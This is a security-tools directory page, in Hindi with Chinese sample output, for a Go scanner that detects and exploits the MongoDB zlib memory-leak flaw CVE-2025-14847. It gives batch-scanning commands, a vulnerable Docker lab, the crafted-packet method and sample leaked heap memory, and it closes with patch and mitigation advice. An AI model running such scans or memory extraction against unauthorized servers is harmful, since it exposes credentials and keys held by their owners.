Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14847 — MongoDB 内存泄露漏洞 (CVE-2025-14847) 检测工具 | Kitploit
उपकरण/GitHubGitHub/onewinner/cve-2025-14847
Vulnerability ScannersMemory ForensicsExploitationInformation GatheringPenetration TestingDatabase Security
GitHubonewinner/cve-2025-14847

CVE-2025-14847

MongoDB 内存泄露漏洞 (CVE-2025-14847) 检测工具

रिपॉजिटरी देखें
1427 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MongoDB CVE-2025-14847 भेद्यता पता लगाने का उपकरण

MongoDB मेमोरी लीक भेद्यता (CVE-2025-14847) पता लगाने का उपकरण


⚠️ महत्वपूर्ण सूचना: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और भेद्यता मूल्यांकन के लिए है। अनधिकृत उपयोग कानून का उल्लंघन हो सकता है।


📋 सूची

  • भेद्यता विवरण
  • विशेषताएँ
  • स्थापना
  • उपयोग विधि
  • परीक्षण वातावरण सेटअप
  • आउटपुट उदाहरण
  • पता लगाने का सिद्धांत
  • सुधार के सुझाव
  • अस्वीकरण

🔍 भेद्यता विवरण

CVE-2025-14847 MongoDB Zlib संपीड़न प्रोटोकॉल प्रसंस्करण में एक गंभीर मेमोरी लीक भेद्यता है। हमलावर दुर्भावनापूर्ण रूप से तैयार किए गए संपीड़ित डेटा पैकेट भेजकर MongoDB को अप्रारंभित हीप मेमोरी डेटा लौटाने का कारण बन सकता है, जिसमें संवेदनशील जानकारी शामिल हो सकती है।

प्रभावित संस्करण

संस्करण सीमास्थिति
8.2.0 - 8.2.2⚠️ प्रभावित
8.0.0 - 8.0.16⚠️ प्रभावित
7.0.0 - 7.0.27⚠️ प्रभावित
6.0.0 - 6.0.26⚠️ प्रभावित
5.0.0 - 5.0.31⚠️ प्रभावित
4.4.0 - 4.4.29⚠️ प्रभावित
4.2.x सभी संस्करण⚠️ प्रभावित
4.0.x सभी संस्करण⚠️ प्रभावित
3.6.x सभी संस्करण⚠️ प्रभावित

भेद्यता के खतरे

  • 🔴 गंभीरता: CVSS 8.7 (उच्च जोखिम)
  • 💾 हीप मेमोरी से संवेदनशील डेटा का रिसाव
  • 🔑 इसमें पासवर्ड, सत्र टोकन, एन्क्रिप्शन कुंजियाँ आदि शामिल हो सकते हैं
  • 🚫 प्रमाणीकरण की आवश्यकता नहीं है
  • 🌐 दूरस्थ रूप से शोषण योग्य

✨ विशेषताएँ

  • ✅ स्मार्ट पहचान - स्वचालित रूप से MongoDB संस्करण की पहचान करें और निर्धारित करें कि क्या यह प्रभावित है
  • ✅ दोहरी सत्यापन - संस्करण जांच → Zlib समर्थन जांच → मेमोरी लीक निकालना
  • ✅ एकल लक्ष्य स्कैन - एकल MongoDB इंस्टेंस का तेजी से पता लगाना
  • ✅ बैच स्कैन - फ़ाइल से लक्ष्य सूची पढ़कर बैच पहचान
  • ✅ समवर्ती स्कैन - स्कैनिंग दक्षता बढ़ाने के लिए मल्टी-थ्रेडेड समवर्तीता का समर्थन करता है
  • ✅ रीयल-टाइम आउटपुट - लीक मेमोरी डेटा का रीयल-टाइम प्रदर्शन
  • ✅ परिणाम निर्यात - कमजोर लक्ष्यों को स्वचालित रूप से फ़ाइल में सहेजें
  • ✅ सरल आउटपुट - स्पष्ट और सुसंगत आउटपुट प्रारूप

🚀 स्थापना

विधि 1: स्रोत कोड से संकलन

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/onewinner/CVE-2025-14847.git
cd CVE-2025-14847

# निर्भरताएँ स्थापित करें
go mod download

# संकलित करें
go build -o mongodb-scanner main.go

# चलाएँ
./mongodb-scanner -t 127.0.0.1:27017

विधि 2: सीधे चलाएँ

root@kitploit:~
go run main.go -t 127.0.0.1:27017

विधि 3: पूर्व-संकलित संस्करण डाउनलोड करें

Releases पृष्ठ पर जाएं और अपने सिस्टम के लिए उपयुक्त पूर्व-संकलित संस्करण डाउनलोड करें।

📖 उपयोग विधि

मूल उपयोग

root@kitploit:~
# एकल लक्ष्य स्कैन करें
./mongodb-scanner -t 127.0.0.1:27017

# फ़ाइल से बैच स्कैन करें
./mongodb-scanner -f targets.txt

# बैच स्कैन (20 थ्रेड)
./mongodb-scanner -f targets.txt -c 20

# स्कैन करें और कमजोर लक्ष्यों को सहेजें
./mongodb-scanner -f targets.txt -o vulnerable.txt

# कस्टम ऑफसेट रेंज (तेज़ या गहन स्कैन)
./mongodb-scanner -t 127.0.0.1:27017 --min-offset 20 --max-offset 1000

कमांड लाइन पैरामीटर

लक्ष्य फ़ाइल प्रारूप

एक targets.txt फ़ाइल बनाएँ:

root@kitploit:~
# MongoDB लक्ष्य सूची
127.0.0.1:27017
192.168.1.100:27017
mongodb.example.com:27017

# यदि पोर्ट निर्दिष्ट नहीं है, तो डिफ़ॉल्ट रूप से 27017 का उपयोग करें
192.168.1.101

🐳 परीक्षण वातावरण सेटअप

इस उपकरण का सुरक्षित रूप से परीक्षण करने के लिए, Docker का उपयोग करके स्थानीय परीक्षण वातावरण सेटअप करने की सलाह दी जाती है।

भेद्यता-प्रभावित MongoDB को त्वरित रूप से शुरू करें

root@kitploit:~
# MongoDB 6.0.14 (भेद्यता-प्रभावित संस्करण) Zlib संपीड़न के साथ शुरू करें
docker run -d \
  --name mongodb-vulnerable \
  -p 27017:27017 \
  mongo:6.0.14 \
  --networkMessageCompressors snappy,zlib

# कंटेनर स्थिति देखें
docker ps

# भेद्यता का परीक्षण करें
./mongodb-scanner -t 127.0.0.1:27017

Docker Compose का उपयोग करें

docker-compose.yml फ़ाइल बनाएँ:

root@kitploit:~
version: '3.8'

services:
  # भेद्यता-प्रभावित संस्करण (Zlib सक्षम)
  mongodb-vulnerable:
    image: mongo:6.0.14
    container_name: mongodb-vulnerable
    ports:
      - "27017:27017"
    command: mongod --networkMessageCompressors snappy,zlib

  # पैच किया गया संस्करण (तुलना परीक्षण के लिए)
  mongodb-patched:
    image: mongo:6.0.27
    container_name: mongodb-patched
    ports:
      - "27018:27017"
    command: mongod --networkMessageCompressors snappy,zlib

volumes:
  mongodb-data:
  mongodb-patched-data:

परीक्षण वातावरण शुरू करें:

root@kitploit:~
# सभी कंटेनर प्रारंभ करें
docker-compose up -d

# भेद्यता-प्रभावित संस्करण का परीक्षण करें
./mongodb-scanner -t 127.0.0.1:27017

# पैच किए गए संस्करण का परीक्षण करें
./mongodb-scanner -t 127.0.0.1:27018

# रोकें और साफ़ करें
docker-compose down -v

परीक्षण वातावरण साफ़ करें

root@kitploit:~
# कंटेनर रोकें और हटाएं
docker stop mongodb-vulnerable && docker rm mongodb-vulnerable

# डेटा वॉल्यूम साफ़ करें
docker volume prune -f

📊 आउटपुट उदाहरण

आउटपुट प्रारूप विवरण

उपकरण आउटपुट जानकारी को चिह्नित करने के लिए एक समान उपसर्ग का उपयोग करता है:

  • [*] - सूचना आउटपुट (लक्ष्य, संस्करण, कॉन्फ़िगरेशन, आदि)
  • [+] - सफलता/भेद्यता मौजूद/डेटा निकाला गया
  • [-] - विफलता/सुरक्षित/भेद्यता मौजूद नहीं
  • [!] - चेतावनी/महत्वपूर्ण सूचना

एकल लक्ष्य स्कैन - भेद्यता मौजूद

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  MongoDB CVE-2025-14847 漏洞检测工具                         ║
╚══════════════════════════════════════════════════════════════╝
⚠️  仅用于授权安全测试 | 未经授权测试可能违法

[*] 目标: 1 | 线程: 10 | 超时: 2s | 偏移: 20-1000
[*] 开始扫描...

[*] 目标: 127.0.0.1:27017
[*] 版本: 6.0.14
[+] 漏洞版本: 是
[+] Zlib压缩: 已开启
[!] 漏洞可利用,开始提取内存...
[+] 偏移=229 长度=250: :00\"},\"s\":\"I\",  \"c\":\"NETWORK\",  \"id\":22944,   \"ctx\":\"conn102932\",

[+] 127.0.0.1:27017 - 漏洞可利用 (v6.0.14) - 3468ms
[+] 成功提取 1 项内存数据:
    [1] :00\"},\"s\":\"I\",  \"c\":\"NETWORK\",  \"id\":22944,   \"ctx\":\"conn102932\",\"msg\":\"Connection ended\",\"attr\":{\"remote\":\"172.17.0.1:44936\"...

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 1 | 安全: 0 | 耗时: 3.4s
======================================================================

एकल लक्ष्य स्कैन - संस्करण सुरक्षित

root@kitploit:~
[*] 目标: 127.0.0.1:27018
[*] 版本: 6.0.27
[-] 漏洞版本: 否

[-] 127.0.0.1:27018 - 版本安全 (v6.0.27) - 156ms

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 0 | 安全: 1 | 耗时: 0.2s
======================================================================

एकल लक्ष्य स्कैन - Zlib सक्षम नहीं

root@kitploit:~
[*] 目标: 127.0.0.1:27017
[*] 版本: 6.0.14
[+] 漏洞版本: 是
[-] Zlib压缩: 未开启

[-] 127.0.0.1:27017 - 未开启Zlib (v6.0.14) - 234ms

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 0 | 安全: 1 | 耗时: 0.3s
======================================================================

बैच स्कैन

root@kitploit:~
[*] 目标: 5 | 线程: 10 | 超时: 2s | 偏移: 20-8192
[*] 开始扫描...

[+] 192.168.1.10:27017 - 漏洞可利用 (v6.0.14) - 3521ms
[+] 成功提取 2 项内存数据:
    [1] Connection ended...
    [2] network statistics...

[-] 192.168.1.11:27017 - 版本安全 (v6.0.27) - 145ms
[-] 192.168.1.12:27017 - 未开启Zlib (v6.0.14) - 198ms
[+] 192.168.1.13:27017 - 漏洞可利用 (v7.0.15) - 2987ms
[!] 192.168.1.14:27017 - 漏洞可利用但未提取到数据 (v6.0.20) - 4123ms

======================================================================
[*] 扫描完成 | 总数: 5 | 可利用: 3 | 安全: 2 | 耗时: 5.2s
======================================================================

[+] 可利用的目标已保存到: vulnerable.txt

🔬 पता लगाने का सिद्धांत

यह उपकरण तीन-चरणीय पहचान तंत्र का उपयोग करता है:

1️⃣ संस्करण पहचान

  • MongoDB इंस्टेंस से कनेक्ट करें
  • संस्करण जानकारी प्राप्त करें (buildInfo कमांड)
  • निर्धारित करें कि संस्करण भेद्यता प्रभाव सीमा में है या नहीं

2️⃣ Zlib संपीड़न समर्थन पहचान

  • Zlib संपीड़न परीक्षण पैकेट भेजें
  • जांचें कि सर्वर संपीड़ित प्रतिक्रिया लौटाता है या नहीं
  • Zlib संपीड़न फ़ंक्शन सक्षम है या नहीं इसकी पुष्टि करें

3️⃣ मेमोरी लीक निकालना

  • दुर्भावनापूर्ण रूप से तैयार किए गए संपीड़ित डेटा पैकेट भेजें
    • दावा करें कि डीकंप्रेसन के बाद का आकार वास्तविक आकार से काफी बड़ा है
    • सर्वर को अप्रारंभित हीप मेमोरी पढ़ने के लिए ट्रिगर करें
  • अधिक डेटा निकालने के लिए कई ऑफसेट स्कैन करें
  • सर्वर प्रतिक्रिया को डीकंप्रेस करें और लीक किए गए फ़ील्ड नाम निकालें
  • मिली मेमोरी डेटा को रीयल-टाइम में प्रदर्शित करें

निर्धारण तर्क

स्थितिपरिणाम
भेद्यता संस्करण + Zlib सक्षम + डेटा निकाला गया✅ भेद्यता का शोषण किया जा सकता है - लीक डेटा दिखाएं
भेद्यता संस्करण + Zlib सक्षम + डेटा नहीं निकाला गया⚠️ भेद्यता का शोषण किया जा सकता है लेकिन डेटा नहीं निकाला गया
भेद्यता संस्करण + Zlib सक्षम नहीं❌ Zlib सक्षम नहीं - शोषण नहीं किया जा सकता

🛠️ सुधार के सुझाव

तत्काल सुधार योजना

निम्नलिखित में से किसी एक पैच संस्करण में तुरंत अपग्रेड करें:

  • MongoDB Server 8.2.3
  • MongoDB Server 8.0.17
  • MongoDB Server 7.0.28
  • MongoDB Server 6.0.27
  • MongoDB Server 5.0.32
  • MongoDB Server 4.4.30

अस्थायी शमन उपाय

यदि अल्पावधि में अपग्रेड नहीं किया जा सकता, तो निम्नलिखित अस्थायी उपाय किए जा सकते हैं:

1. Zlib संपीड़न अक्षम करें

mongod.conf या mongos.conf में कॉन्फ़िगर करें:

root@kitploit:~
net:
  compression:
    compressors: []

या प्रारंभ पैरामीटर में zlib को स्पष्ट रूप से बाहर करें:

root@kitploit:~
mongod --networkMessageCompressors snappy,zstd

2. अन्य संपीड़न एल्गोरिदम का उपयोग करें

zlib के बजाय snappy या zstd का उपयोग करने की अनुशंसा की जाती है:

root@kitploit:~
net:
  compression:
    compressors: snappy,zstd

3. नेटवर्क एक्सेस नियंत्रण

  • MongoDB पोर्ट को केवल विश्वसनीय IP के लिए प्रतिबंधित करें
  • फ़ायरवॉल नियमों या bindIp कॉन्फ़िगरेशन का उपयोग करें
  • TLS/SSL एन्क्रिप्टेड ट्रांसमिशन सक्षम करें

4. एक्सेस नियंत्रण सक्षम करें

  • प्रमाणीकरण तंत्र सक्षम करें (--auth पैरामीटर)
  • मजबूत पासवर्ड नीति का उपयोग करें
  • न्यूनतम विशेषाधिकार सिद्धांत लागू करें

5. निगरानी और ऑडिट

  • असामान्य कनेक्शन और मेमोरी एक्सेस पैटर्न की निगरानी करें
  • ऑडिट लॉगिंग सक्षम करें
  • नियमित रूप से सुरक्षा लॉग की जाँच करें

⚠️ महत्वपूर्ण सूचना: अस्थायी शमन उपाय केवल जोखिम को कम कर सकते हैं, यह स्थायी समाधान नहीं है। दृढ़ता से अनुशंसा की जाती है कि जल्द से जल्द पैच किए गए संस्करण में अपग्रेड करें।

⚠️ अस्वीकरण

महत्वपूर्ण सूचना:

  • ✅ यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और भेद्यता मूल्यांकन के लिए है
  • ✅ इस उपकरण का उपयोग करने से पहले, सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली का परीक्षण करने की अनुमति है
  • ❌ अनधिकृत स्कैन कानूनों और विनियमों का उल्लंघन कर सकता है
  • ❌ लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है

इस उपकरण का उपयोग करने का मतलब है कि आप सहमत हैं:

  1. केवल स्पष्ट रूप से अधिकृत प्रणालियों पर ही उपयोग करें
  2. अपने क्षेत्र के कानूनों और विनियमों का पालन करें
  3. इस उपकरण के उपयोग से होने वाले किसी भी परिणाम के लिए जिम्मेदार हों

📄 लाइसेंस

यह प्रोजेक्ट MIT License ओपन-सोर्स लाइसेंस के तहत उपलब्ध है।

🤝 योगदान

Issue और Pull Request का स्वागत है!

योगदान दिशानिर्देश

  1. इस रिपॉजिटरी को Fork करें
  2. अपनी फीचर शाखा बनाएँ (git checkout -b feature/AmazingFeature)
  3. अपने परिवर्तनों को प्रतिबद्ध करें (git commit -m 'Add some AmazingFeature')
  4. शाखा पर पुश करें (git push origin feature/AmazingFeature)
  5. Pull Request खोलें

📚 संदर्भ

  • CVE-2025-14847 विवरण
  • MongoDB सुरक्षा अलर्ट
  • MongoDB अपग्रेड गाइड
  • MongoDB संपीड़न कॉन्फ़िगरेशन

👨‍💻 लेखक

onewinner - @onewinner

प्रोजेक्ट पता: https://github.com/onewinner/CVE-2025-14847

📝 अपडेट लॉग

v1.0.0 (2025-12-26)

  • 🎉 प्रारंभिक संस्करण जारी
  • ✅ एकल लक्ष्य और बैच स्कैन का समर्थन करता है
  • ✅ मल्टी-थ्रेडेड समवर्ती स्कैन का समर्थन करता है
  • ✅ स्वचालित संस्करण पहचान और जोखिम मूल्यांकन
  • ✅ बुद्धिमान मेमोरी लीक डिटेक्शन
  • ✅ विस्तृत सुधार सुझाव

⭐ यदि यह प्रोजेक्ट आपके लिए मददगार है, तो कृपया एक Star दें!

Made with ❤️ by Security Researchers

टूल डाउनलोड करें
पैरामीटरविवरणडिफ़ॉल्ट मान
-t <target>एकल लक्ष्य (उदाहरण: 127.0.0.1:27017)-
-f <file>लक्ष्य फ़ाइल (प्रति पंक्ति एक लक्ष्य)-
-c <num>समवर्ती थ्रेड्स की संख्या10
-timeout <time>कनेक्शन टाइमआउट2s
-o <file>आउटपुट फ़ाइल (कमजोर लक्ष्यों को सहेजें)-
--min-offset <num>न्यूनतम दस्तावेज़ लंबाई ऑफसेट20
--max-offset <num>अधिकतम दस्तावेज़ लंबाई ऑफसेट8192
गैर-भेद्यता संस्करण
✅ संस्करण सुरक्षित